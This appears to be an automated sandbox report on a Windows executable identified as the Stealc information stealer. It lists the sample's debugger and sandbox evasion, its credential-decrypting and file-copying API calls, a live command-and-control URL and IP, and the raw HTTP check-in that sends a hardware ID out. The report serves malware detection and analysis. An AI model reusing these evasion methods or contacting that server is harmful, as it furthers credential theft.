Source: file.exe, 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000001.00000002.1389080982.00000000016AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware+

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00E44A60 VirtualProtect 00000000,00000004,00000100,?

1_2_00E44A60

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

1_2_00E66390

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00E66390 mov eax, dword ptr fs:[00000030h]

1_2_00E66390

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00E62AD0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,

1_2_00E62AD0

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 7468, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E646A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,		1_2_00E646A0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E64610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,		1_2_00E64610

Source: file.exe, file.exe, 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: G[Program Manager

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

1_2_00E62D60

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00E62B60 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,

1_2_00E62B60

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00E62A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

1_2_00E62A40

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00E62C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

1_2_00E62C10

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1332375323.0000000005490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1389080982.00000000016AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7468, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1332375323.0000000005490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1389080982.00000000016AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7468, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.206	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.206/c4becf79229cb002.php	false		high
http://185.215.113.206/	false		high

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.206/c4becf79229cb002.phpft	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpv9	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/d9	Avira URL Cloud: Label: malware

Found malware configuration

Source: file.exe.7468.1.memstrmin

Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E44C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,	1_2_00E44C50
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E460D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,	1_2_00E460D0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E640B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	1_2_00E640B0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E56960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,	1_2_00E56960
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E4EA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,	1_2_00E4EA30
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E49B80 CryptUnprotectData,LocalAlloc,LocalFree,	1_2_00E49B80
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E56B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,	1_2_00E56B79
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E49B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	1_2_00E49B20
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E47750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	1_2_00E47750

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E518A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	1_2_00E518A0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E53910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	1_2_00E53910
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E51269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	1_2_00E51269
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E51250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	1_2_00E51250
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E5E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	1_2_00E5E210
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E5CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	1_2_00E5CBE0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E523A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,	1_2_00E523A9
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E4DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	1_2_00E4DB80
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E52390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,	1_2_00E52390
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E4DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	1_2_00E4DB99
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E54B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,	1_2_00E54B29
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E54B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	1_2_00E54B10
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E5DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,	1_2_00E5DD30
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E5D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,	1_2_00E5D530
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E416A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	1_2_00E416A0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E416B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,	1_2_00E416B9

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49710 -> 185.215.113.206:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://185.215.113.206/c4becf79229cb002.php

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJECAEHJJJKJKFIDGCBGHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 35 35 33 45 39 37 38 46 41 44 37 32 32 38 34 35 38 32 31 32 37 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 47 2d 2d 0d 0a Data Ascii: ------IJECAEHJJJKJKFIDGCBGContent-Disposition: form-data; name="hwid"2553E978FAD72284582127------IJECAEHJJJKJKFIDGCBGContent-Disposition: form-data; name="build"mars------IJECAEHJJJKJKFIDGCBG--

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 185.215.113.206 185.215.113.206

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206

Source: C:\Users\user\Desktop\file.exe

1_2_00E46C40

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache

Source: unknown

Source: file.exe, 00000001.00000002.1389080982.00000000016AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/H
Source: file.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: file.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php&
Source: file.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpF
Source: file.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpR
Source: file.exe, 00000001.00000002.1389080982.00000000016AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpft
Source: file.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpv9
Source: file.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/d9
Source: file.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/ws

Source: C:\Users\user\Desktop\file.exe

1_2_00E49770

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D	1_2_0120911D
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E648B0	1_2_00E648B0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120C8AC	1_2_0120C8AC
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_01246097	1_2_01246097
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_011300F7	1_2_011300F7
